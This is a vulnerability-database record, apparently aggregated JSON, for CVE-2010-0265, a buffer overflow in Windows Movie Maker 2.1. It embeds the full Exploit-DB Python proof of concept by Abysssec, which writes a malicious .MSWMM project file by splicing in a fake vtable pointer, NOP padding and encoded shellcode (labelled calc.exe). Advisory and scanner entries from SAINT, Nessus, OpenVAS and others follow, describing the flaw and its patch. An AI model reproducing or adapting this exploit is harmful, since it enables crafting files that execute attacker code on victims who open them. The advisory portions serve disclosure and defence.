{"bulletinFamily": "exploit", "id": "EDB-ID:14886", "cvelist": ["CVE-2010-0265"], "modified": "2010-09-04T00:00:00", "lastseen": "2016-02-01T20:45:27", "edition": 1, "sourceData": "'''\r\n __ __ ____ _ _ ____ \r\n | \\/ |/ __ \\ /\\ | | | | _ \\ \r\n | \\ / | | | | / \\ | | | | |_) |\r\n | |\\/| | | | |/ /\\ \\| | | | _ < Day 4 \r\n | | | | |__| / ____ \\ |__| | |_) |\r\n |_| |_|\\____/_/ \\_\\____/|____/ \r\n\r\n http://www.exploit-db.com/movie-maker-remote-code-execution-ms10-016/\r\n https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14886.zip (Movie-Maker-Remote-Code-Execution-Exploit.zip)\r\n\r\n Title : Movie Maker Remote Code Execution (MS10-016)\r\n Version : moviemk.exe 2.1 (XP SP3)\r\n Analysis : http://www.abysssec.com\r\n Vendor : http://www.microsoft.com\r\n Impact : Ciritical\r\n Contact : shahin [at] abysssec.com , info [at] abysssec.com\r\n Twitter : @abysssec\r\n CVE : CVE-2010-0265\r\n\r\n \r\n'''\r\n\r\n\r\n# Exploit for CVE-2010-0265\r\n# Tested on Windows XP SP3( Movie Maker 2.1 )\r\n \r\n\r\n\r\nimport sys\r\n\r\ndef main():\r\n \r\n try:\r\n\t\tfdR = open('src.mswmm', 'rb+')\r\n\t\tstrTotal = fdR.read()\r\n\t\tstr1 = strTotal[:9976]\r\n\t\tstr2 = strTotal[9980:10104]\r\n\t\tstr3 = strTotal[10108:16496]\r\n\t\tstr4 = strTotal[17620:]\r\n\t\t\r\n\t\tsize_first_new = \"\\x20\\x00\\x00\\x00\" # size of first new()\r\n\t\tsize_second_new = \"\\x11\\x11\\x00\\x00\" \t# size of second new()\r\n\t\t\r\n\t\tp2p = \"\\x71\\xb5\\x06\\x77\" # vtable fake pointer from resource section COMRes -8 to jmp EBX \r\n\t\t\r\n\t\t# shellcode calc.exe\r\n\t\tshellcode = '\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xeb\\x00\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x48\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x51\\x5a\\x6a\\x44\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x54\\x42\\x32\\x41\\x42\\x32\\x42\\x41\\x30\\x42\\x41\\x58\\x41\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x69\\x6c\\x4b\\x58\\x51\\x54\\x65\\x50\\x57\\x70\\x45\\x50\\x4e\\x6b\\x67\\x35\\x35\\x6c\\x4e\\x6b\\x73\\x4c\\x55\\x55\\x71\\x68\\x67\\x71\\x68\\x6f\\x6c\\x4b\\x52\\x6f\\x46\\x78\\x4e\\x6b\\x51\\x4f\\x71\\x30\\x74\\x41\\x7a\\x4b\\x30\\x49\\x6c\\x4b\\x54\\x74\\x6e\\x6b\\x76\\x61\\x4a\\x4e\\x35\\x61\\x4b\\x70\\x6a\\x39\\x4c\\x6c\\x4d\\x54\\x6b\\x70\\x30\\x74\\x54\\x47\\x6a\\x61\\x6a\\x6a\\x64\\x4d\\x63\\x31\\x79\\x52\\x4a\\x4b\\x69\\x64\\x67\\x4b\\x32\\x74\\x65\\x74\\x66\\x64\\x31\\x65\\x4a\\x45\\x6c\\x4b\\x71\\x4f\\x31\\x34\\x57\\x71\\x48\\x6b\\x52\\x46\\x6e\\x6b\\x64\\x4c\\x52\\x6b\\x4e\\x6b\\x31\\x4f\\x77\\x6c\\x54\\x41\\x68\\x6b\\x4c\\x4b\\x57\\x6c\\x6c\\x4b\\x57\\x71\\x4a\\x4b\\x4e\\x69\\x41\\x4c\\x65\\x74\\x67\\x74\\x4a\\x63\\x75\\x61\\x4f\\x30\\x51\\x74\\x6c\\x4b\\x61\\x50\\x50\\x30\\x4f\\x75\\x4f\\x30\\x32\\x58\\x64\\x4c\\x4c\\x4b\\x71\\x50\\x54\\x4c\\x4c\\x4b\\x70\\x70\\x57\\x6c\\x4e\\x4d\\x6e\\x6b\\x73\\x58\\x35\\x58\\x4a\\x4b\\x36\\x69\\x6c\\x4b\\x4d\\x50\\x4c\\x70\\x67\\x70\\x75\\x50\\x37\\x70\\x4c\\x4b\\x45\\x38\\x35\\x6c\\x41\\x4f\\x57\\x41\\x68\\x76\\x53\\x50\\x30\\x56\\x6e\\x69\\x6b\\x48\\x6f\\x73\\x6f\\x30\\x63\\x4b\\x62\\x70\\x30\\x68\\x58\\x70\\x6f\\x7a\\x57\\x74\\x51\\x4f\\x45\\x38\\x6f\\x68\\x59\\x6e\\x4f\\x7a\\x66\\x6e\\x62\\x77\\x69\\x6f\\x38\\x67\\x73\\x53\\x52\\x41\\x30\\x6c\\x71\\x73\\x64\\x6e\\x35\\x35\\x30\\x78\\x70\\x65\\x45\\x50\\x44'\r\n\t\t\r\n\t\t\t\t\t\r\n\t\tif len(shellcode) > 1120:\r\n\t\t\tprint \"[*] Error : Shellcode length is long\"\r\n\t\t\treturn\r\n\t\tif len(shellcode) <= 1120:\r\n\t\t\tdif = 1120- len(shellcode)\r\n\t\t\twhile dif > 0 :\r\n\t\t\t\tshellcode += '\\x90'\r\n\t\t\t\tdif = dif - 1\r\n\t\t\t\t\r\n\t\tfdW= open('exploit.mswmm', 'wb+')\r\n\t\tfdW.write(str1)\r\n\t\tfdW.write(size_first_new)\r\n\t\tfdW.write(str2)\r\n\t\tfdW.write(size_second_new)\r\n\t\tfdW.write(str3)\r\n\t\tfdW.write(p2p)\r\n\t\tfdW.write('\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90') # padding\t\t\r\n\t\tfdW.write(shellcode)\r\n\t\tfdW.write(str4)\r\n\t\t\r\n\t\t\r\n\t\tfdW.close()\r\n\t\tfdR.close()\r\n\t\tprint '[-] Movie Maker file(.MSWMM) generated'\r\n except IOError:\r\n print '[*] Error : An IO error has occurred'\r\n print '[-] Exiting ...'\r\n sys.exit(-1)\r\n \r\nif __name__ == '__main__':\r\n main()", "published": "2010-09-04T00:00:00", "href": "https://www.exploit-db.com/exploits/14886/", "osvdbidlist": [], "reporter": "Abysssec", "hash": "d80ceba8ab8dd60dba29ca078abf6fe08c03eac00239d14252a7f2b749448a5b", "title": "Movie Maker - Remote Code Execution MS10-016", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "MOAUB #4 - Movie Maker Remote Code Execution (MS10-016). CVE-2010-0265. Remote exploit for windows platform", "references": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/14886/", "viewCount": 1, "enchantments": {"vulnersScore": 5.5}}

{"result": {"cve": [{"id": "CVE-2010-0265", "type": "cve", "title": "CVE-2010-0265", "description": "Buffer overflow in Microsoft Windows Movie Maker 2.1, 2.6, and 6.0, and Microsoft Producer 2003, allows remote attackers to execute arbitrary code via a crafted project (.MSWMM) file, aka \"Movie Maker and Producer Buffer Overflow Vulnerability.\"", "published": "2010-03-10T17:30:01", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0265", "cvelist": ["CVE-2010-0265"], "lastseen": "2017-09-19T13:36:50"}], "saint": [{"id": "SAINT:B6369738F65BDCBE2EB736FB2F2098D4", "type": "saint", "title": "Microsoft Windows Movie Maker IsValidWMToolsStream buffer overflow", "description": "Added: 05/19/2010 \nCVE: [CVE-2010-0265](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0265>) \nBID: [38515](<http://www.securityfocus.com/bid/38515>) \nOSVDB: [62811](<http://www.osvdb.org/62811>) \n\n\n### Background\n\n[Windows Movie Maker](<http://www.microsoft.com/windowsxp/downloads/updates/moviemaker2.mspx>) is software for creating and editing home movies. \n\n### Problem\n\nA buffer overflow vulnerability in the IsValidWMToolsStream function allows command execution when a user opens a specially crafted .MSWMM file. \n\n### Resolution\n\nApply the update referenced in [Microsoft Security Bulletin 10-016](<http://www.microsoft.com/technet/security/bulletin/MS10-016.mspx>). \n\n### References\n\n<http://seclists.org/fulldisclosure/2010/Mar/173> \n\n\n### Limitations\n\nExploit works on Windows Movie Maker 2.1 and requires a user to open the exploit file. \n\n### Platforms\n\nWindows XP \n \n\n", "published": "2010-05-19T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ms_movie_maker_isvalid", "cvelist": ["CVE-2010-0265"], "lastseen": "2016-10-03T15:01:56"}, {"id": "SAINT:78DCBFB71B7236C703750A96712A4BAA", "type": "saint", "title": "Microsoft Windows Movie Maker IsValidWMToolsStream buffer overflow", "description": "Added: 05/19/2010 \nCVE: [CVE-2010-0265](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0265>) \nBID: [38515](<http://www.securityfocus.com/bid/38515>) \nOSVDB: [62811](<http://www.osvdb.org/62811>) \n\n\n### Background\n\n[Windows Movie Maker](<http://www.microsoft.com/windowsxp/downloads/updates/moviemaker2.mspx>) is software for creating and editing home movies. \n\n### Problem\n\nA buffer overflow vulnerability in the IsValidWMToolsStream function allows command execution when a user opens a specially crafted .MSWMM file. \n\n### Resolution\n\nApply the update referenced in [Microsoft Security Bulletin 10-016](<http://www.microsoft.com/technet/security/bulletin/MS10-016.mspx>). \n\n### References\n\n<http://seclists.org/fulldisclosure/2010/Mar/173> \n\n\n### Limitations\n\nExploit works on Windows Movie Maker 2.1 and requires a user to open the exploit file. \n\n### Platforms\n\nWindows XP \n \n\n", "published": "2010-05-19T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ms_movie_maker_isvalid", "cvelist": ["CVE-2010-0265"], "lastseen": "2016-12-14T16:58:05"}, {"id": "SAINT:5DCC9664E943DA26775DAB6A460DB2C1", "type": "saint", "title": "Microsoft Windows Movie Maker IsValidWMToolsStream buffer overflow", "description": "Added: 05/19/2010 \nCVE: [CVE-2010-0265](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0265>) \nBID: [38515](<http://www.securityfocus.com/bid/38515>) \nOSVDB: [62811](<http://www.osvdb.org/62811>) \n\n\n### Background\n\n[Windows Movie Maker](<http://www.microsoft.com/windowsxp/downloads/updates/moviemaker2.mspx>) is software for creating and editing home movies. \n\n### Problem\n\nA buffer overflow vulnerability in the IsValidWMToolsStream function allows command execution when a user opens a specially crafted .MSWMM file. \n\n### Resolution\n\nApply the update referenced in [Microsoft Security Bulletin 10-016](<http://www.microsoft.com/technet/security/bulletin/MS10-016.mspx>). \n\n### References\n\n<http://seclists.org/fulldisclosure/2010/Mar/173> \n\n\n### Limitations\n\nExploit works on Windows Movie Maker 2.1 and requires a user to open the exploit file. \n\n### Platforms\n\nWindows XP \n \n\n", "published": "2010-05-19T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ms_movie_maker_isvalid", "cvelist": ["CVE-2010-0265"], "lastseen": "2017-01-10T14:03:44"}], "nessus": [{"id": "SMB_NT_MS10-016.NASL", "type": "nessus", "title": "MS10-016: Vulnerability in Windows Movie Maker Could Allow Remote Code Execution (975561)", "description": "The remote Windows host contains a version of Windows Movie Maker that is affected by a buffer overflow vulnerability due to the way the application parses project file formats.\n\nIf an attacker can trick a user on the affected system into opening a specially crafted Movie Maker or Producer file using the affected application, this issue could be leveraged to execute arbitrary code subject to the user's privileges.", "published": "2010-03-09T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=45020", "cvelist": ["CVE-2010-0265"], "lastseen": "2017-10-29T13:41:50"}], "openvas": [{"id": "OPENVAS:1361412562310900232", "type": "openvas", "title": "Microsoft Windows Movie Maker Could Allow Remote Code Execution Vulnerability (975561)", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-016.", "published": "2010-03-10T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900232", "cvelist": ["CVE-2010-0265"], "lastseen": "2018-01-02T10:54:51"}, {"id": "OPENVAS:900232", "type": "openvas", "title": "Microsoft Windows Movie Maker Could Allow Remote Code Execution Vulnerability (975561)", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-016.", "published": "2010-03-10T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=900232", "cvelist": ["CVE-2010-0265"], "lastseen": "2017-07-02T21:10:02"}], "seebug": [{"id": "SSV:69768", "type": "seebug", "title": "Movie Maker- Remote Code Execution (MS10-016)", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-69768", "cvelist": ["CVE-2010-0265"], "lastseen": "2017-11-19T15:36:45"}], "packetstorm": [{"id": "PACKETSTORM:93497", "type": "packetstorm", "title": "Month Of Abysssec Undisclosed Bugs - Movie Maker", "description": "", "published": "2010-09-06T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/93497/Month-Of-Abysssec-Undisclosed-Bugs-Movie-Maker.html", "cvelist": ["CVE-2010-0265"], "lastseen": "2016-12-05T22:25:09"}]}}